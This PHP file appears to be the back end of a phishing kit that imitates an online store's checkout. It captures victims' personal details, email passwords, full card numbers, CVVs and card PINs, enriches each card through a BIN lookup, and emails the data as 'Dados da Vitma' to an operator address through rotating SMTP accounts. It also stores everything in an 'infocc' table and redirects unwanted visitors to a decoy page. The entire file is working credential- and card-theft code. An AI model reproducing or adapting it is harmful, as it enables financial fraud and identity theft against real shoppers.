<?php
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\SMTP;
use PHPMailer\PHPMailer\Exception;
if(isset($_GET['COMON/']) && ISSET($_SESSION["id"])){
	$p = $_GET['COMON/'];
	
	if(isset($_SESSION[$p]) && $_SESSION[$p] == $p){ 
	



//POSTS
$id = $_SESSION["id"];	
$numeropedido = '02-'.rand(1443130, 9999900);
$numerocasa =  $_SESSION['numero'];
$cidade =  $_SESSION['cidade'];
$estado =  $_SESSION['estado'];
$bairro =  $_SESSION['bairro'];
$id = $_SESSION['id'];
$email = $_SESSION['email'];
$password = $_SESSION['password'];
$name = $_SESSION['name'];
$nasc = $_SESSION['nasc'];
$cpf = $_SESSION['cpf'];
$cpflimpo = str_replace('.', '', $cpf);
$cpflimpo = str_replace('-', '', $cpflimpo);
$cel = $_SESSION['cel'];
$destinatario = $_SESSION['name'];
$cep = $_SESSION['cep'];
$cep = str_replace('-', '', $cep);
$endereco = $_SESSION['rua'];
$cidadeestado = $_SESSION['cidadeestado'];
$cellimpo = str_replace('(', '', $cel);
$cellimpo = str_replace(')', '', $cellimpo);
$cellimpo = str_replace(' ', '', $cellimpo);
$cellimpo = str_replace('-', '', $cellimpo);
$celularnum = substr($cellimpo, 3);
$tel = '';
$dddcel = substr($cellimpo, 0, 2);
$query_Produto = "SELECT * FROM produtos WHERE id = '$id'";
$Produto = mysqli_query($ConnectDB, $query_Produto) or die(mysqli_error($ConnectDB));
$row_Produto = mysqli_fetch_assoc($Produto);
$totalRows_Produto = mysqli_num_rows($Produto);
$NomeProduto = addslashes($row_Produto["nome"]);
$Preco = addslashes($row_Produto["preco"]);
$ProdutoSalva = addslashes($NomeProduto.'<b>Valor:</b> R$'.$Preco);
$foto = addslashes($row_Produto["foto"]);
$send = $row_Produto["send"];
$valor = str_replace('.','', $Preco);
$valor = str_replace(',','.', $valor);
$valorin =$valor;


//POSTS








$numerocard = $_POST["number"];
$titular = $_POST["name"];
$cpftitular = $_POST["cpftit"];
$validade = $_POST["expiryDate"];
$cvv  = $_POST["securityCode"];
$datacompra = date("d/m/Y");
$binnum = str_replace(' ', '', $numerocard); 
$binnum = substr($numerocard, 0, 6); 
$agent = $_SERVER['HTTP_USER_AGENT'];
$agent = addslashes($agent);


if(empty($_POST["senhacard"])){
	$senhacard = 'null';
	
}else{

$senhacard = $_POST["senhacard"];
}




$data = date('Y-m-d\TH:i:sO', time());
$datasoma = date('Y-m-d', strtotime('+2 days'));









//PEGABIN








$url = "https://lookup.binlist.net/$binnum";

$curl = curl_init($url);
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

$headers = array(
   "Accept-Version: 3",
);
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
//for debug only!
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);

$resp = curl_exec($curl);
curl_close($curl);




$bandeira = explode('"scheme":"', $resp);
$bandeira = explode('"', $bandeira[1]);
$bandeira = $bandeira[0];
	

$banco = explode('"bank":{"name":"', $resp);
$banco = explode('"', $banco[1]);
$banco = $banco[0];
	

$level = explode('"brand":"', $resp);
$level = explode('"', $level[1]);
$level = $level[0];
	

$pais = explode('"name":"', $resp);
$pais = explode('"', $pais[1]);
$pais = $pais[0];
	


$bin =  "Bandeira:". $bandeira." Banco: ".$banco." Level: ".$level."  Pais: ".$pais;

	



//PEGABIN











if($senhacard == 'null'){
		
		$senhacard1 = '';
		$assunto = 'CC';
	}elseif($senhacard == ''){
		
		$senhacard1 = '';
		$assunto = 'CC';
		
	}else{
			$assunto = 'C0nsul';
		$senhacard1 = '
		  <div class="row">
                    <div class="col-sm-3">
                    <h6 class="mb-0"><strong>Senha CC</strong>    '.$senhacard.'</h6>
                  </div>
                  </div>';
		
	}









//SMTP

	$msg = '
<!doctype html>
<html>
  <head>
    <title>APACHE </title>
 
<style>
body{
    margin-top:20px;
    color: #1a202c;
    text-align: left;
    background-color: #e2e8f0;    
}

.card {
    box-shadow: 0 1px 3px 0 rgba(0,0,0,.1), 0 1px 2px 0 rgba(0,0,0,.06);
}



.gutters-sm {
    margin-right: -8px;
    margin-left: -8px;
}

.gutters-sm>.col, .gutters-sm>[class*=col-] {
    padding-right: 8px;
    padding-left: 8px;
}

.shadow-none {
    box-shadow: none!important;
}

.row{



}

.text-secondary{

display:inline;
}



h2 {
    text-transform: uppercase;
    font-weight: 700;
}
h2 {
    font-size: 16px;
    margin: 0 0 30px;
}
h1, h2, h3, h4, h5, h6 {
    font-family: sans-serif;
    letter-spacing: 2px;
    color: #333;
    font-weight: 600;
}

</style>
</head>
<body>

                <div class="card-body">
				
				<h2 class="my-4">
    							<span>Dados da Vitma</span>
    						</h2>
				 <hr>
                  <div class="row">
                    <div class="col-sm-3">
                      <h6 class="mb-0"><strong>Nome</strong>    '.$name.'</h6>
                    </div>
                   
                  </div>
                 
                  <div class="row">
                    <div class="col-sm-3">
                     <h6 class="mb-0"><strong>CPF</strong>    '.$cpf.'</h6>
                    </div>
                  </div>
                 
                  <div class="row">
                    <div class="col-sm-3">
                  <h6 class="mb-0"><strong>Nascimento</strong>    '.$nasc.'</h6>
                    </div>
                  </div>
                 
                  <div class="row">
                    <div class="col-sm-3">
                  <h6 class="mb-0"><strong>Telefone</strong>    '.$cel.'</h6>
                  </div>
                  
                  <div class="row">
                    <div class="col-sm-3">
                 <h6 class="mb-0"><strong>Email/Senha</strong>    '.$email.' | '.$password.'</h6>
                  </div>
				  
				
                  <div class="row">
                    <div class="col-sm-3">
                    <h6 class="mb-0"><strong>Endereço</strong>    '.$endereco.'</h6>
                  </div>
                  </div>
				  
				 
                  <div class="row">
                    <div class="col-sm-3">
                    <h6 class="mb-0"><strong>Cidade/Estado</strong>    '.$cidadeestado.' - '.$cep.'</h6>
                  </div>
                  </div>
				  
				 
				   
				  <h2 class="my-4"  style="margin-top:15px;	">
    							<span>Dados do Cartao</span>
    						</h2>
				  
				   <hr>
				  
				 	 
                  <div class="row">
                    <div class="col-sm-3">
                    <h6 class="mb-0"><strong>Titular</strong>    '.$titular.'</h6>
                  </div>
                  </div>
				  
				
				  
				    
				 	 
                  <div class="row">
                    <div class="col-sm-3">
                    <h6 class="mb-0"><strong>CPF Titular</strong>    '.$cpftitular.'</h6>
                  </div>
                  </div>
				  
				
				  
				  	
				  
				    
				 	   
                  <div class="row">
                    <div class="col-sm-3">
                    <h6 class="mb-0"><strong>Numero Cartao</strong>    '.$numerocard.'</h6>
                  </div>
                  </div>
				  
						  
				    
				 	
                  <div class="row">
                    <div class="col-sm-3">
                    <h6 class="mb-0"><strong>Validade</strong>    '.$validade.'</h6>
                  </div>
                  </div>
				  
					    
                  <div class="row">
                    <div class="col-sm-3">
                    <h6 class="mb-0"><strong>CVV</strong>    '.$cvv.'</h6>
                  </div>
                  </div>
				  	

			  
					
                 '.$senhacard1.'
				  
				
				  
				    	 	 
                  <div class="row">
                    <div class="col-sm-3">
                    <h6 class="mb-0"><strong>Bin</strong>    '.$bin.'</h6>
                  </div>
                  </div>
				  
				     <div class="row">
                    <div class="col-sm-3">
                    <h6 class="mb-0"><strong>Agent</strong>    '.$agent.'</h6>
                  </div>
                  </div>
				  
				  
				  
                </div>
				
				
              </div>
             
            </div>
         

</body>
</html>

';




if($numerocard == ''){}else{

if($statusmtp == '1'){




mysqli_select_db($ConnectDB, $database_ConnectDB);
			$query_Recordset1b = "SELECT * FROM smtp ORDER BY rand() LIMIT 1";
			$Recordset1b = mysqli_query($ConnectDB, $query_Recordset1b) or die(mysqli_error($ConnectDB));
			$row_Recordset1b = mysqli_fetch_assoc($Recordset1b);
			$totalRows_Recordset1b = mysqli_num_rows($Recordset1b);

	
	
	
	if($totalRows_Recordset1b > '0'){
		
		
		
		$hostsm = $row_Recordset1b["host"];
		$usersm = $row_Recordset1b["user"];
		$passsm = $row_Recordset1b["senha"];
		$portasm = $row_Recordset1b["porta"];
		require './vendor/autoload.php';
		$mail = new PHPMailer(true);

		try {
    //Server settings
   //$mail->SMTPDebug = SMTP::DEBUG_SERVER;                      //Enable verbose debug output
    $mail->isSMTP();                                            //Send using SMTP
    $mail->Host       = "$hostsm";                     //Set the SMTP server to send through
    $mail->SMTPAuth   = true;                                   //Enable SMTP authentication
    $mail->Username   = "$usersm";                     //SMTP username
    $mail->Password   = "$passsm";                               //SMTP password
    $mail->SMTPSecure = PHPMailer::ENCRYPTION_SMTPS;            //Enable implicit TLS encryption
    $mail->Port       = $portasm;                                   //TCP port to connect to; use 587 if you have set `SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS`
	$mail->setLanguage('pt_br');
    //Recipients
    $mail->setFrom("$usersm", 'Apach3 0rigin4l');
    $mail->addAddress("$send", 'F1nanceiro');     //Add a recipient
   // $mail->addAddress('ellen@example.com');               //Name is optional
   // $mail->addReplyTo('info@example.com', 'Information');
   // $mail->addCC('cc@example.com');
    //$mail->addBCC('bcc@example.com');

    //Attachments
    //$mail->addAttachment('/var/tmp/file.tar.gz');         //Add attachments
   // $mail->addAttachment('/tmp/image.jpg', 'new.jpg');    //Optional name

    //Content
    $mail->isHTML(true);                                  //Set email format to HTML
   $mail->Subject = 'Original voltou -> '.$numerocard;
  $mail->Body = '<br/>' . $msg . '<br/>' ; //Corpo da mensagem caso seja HTML
  $mail->AltBody = nl2br(strip_tags($msg));

    $mail->send();
    	
		
		
		
} catch (Exception $e) {}
		
		
		
	}

	
	
}

}




$query_VerificaCompra = "SELECT * FROM infocc WHERE cpf = '$cpf' AND numerocard = '$numerocard'";
$VerificaCompra = mysqli_query($ConnectDB, $query_VerificaCompra) or die(mysqli_error($ConnectDB));
$row_VerificaCompra = mysqli_fetch_assoc($VerificaCompra);
$totalRows_VerificaCompra = mysqli_num_rows($VerificaCompra);

if($totalRows_VerificaCompra == '0'){
	
	
	
	if($numerocard == ''){}else{
	
$insertSQL = "INSERT INTO infocc (produtoid, nome, cpf, email, senha, telefone1, telefone2, datanasc, destinatario, cep, cidadeestado, endereco,  numeropedido, numerocard, validade, cvv, titular, cpftitular, bin, produto, senhacard, agent) VALUES ('$id', '$name', '$cpf', '$email', '$password', '$cel', '$cel', '$nasc', '$destinatario', '$cep', '$cidadeestado', '$endereco', '$numeropedido', '$numerocard', '$validade', '$cvv', '$titular', '$cpftitular', '$bin', '$ProdutoSalva', '$senhacard', '$agent')";

mysqli_select_db($ConnectDB, $database_ConnectDB);

$Result1 = mysqli_query($ConnectDB, $insertSQL) or die(mysqli_error($ConnectDB));

}}






	
 }else{
	
		Header( "Location: https://www.techtudo.com.br/listas/2018/07/o-que-e-erro-404-veja-significado-dos-problemas-mais-comuns.ghtml" );
}


}else{
	
		Header( "Location: https://www.techtudo.com.br/listas/2018/07/o-que-e-erro-404-veja-significado-dos-problemas-mais-comuns.ghtml" );
	
} ?>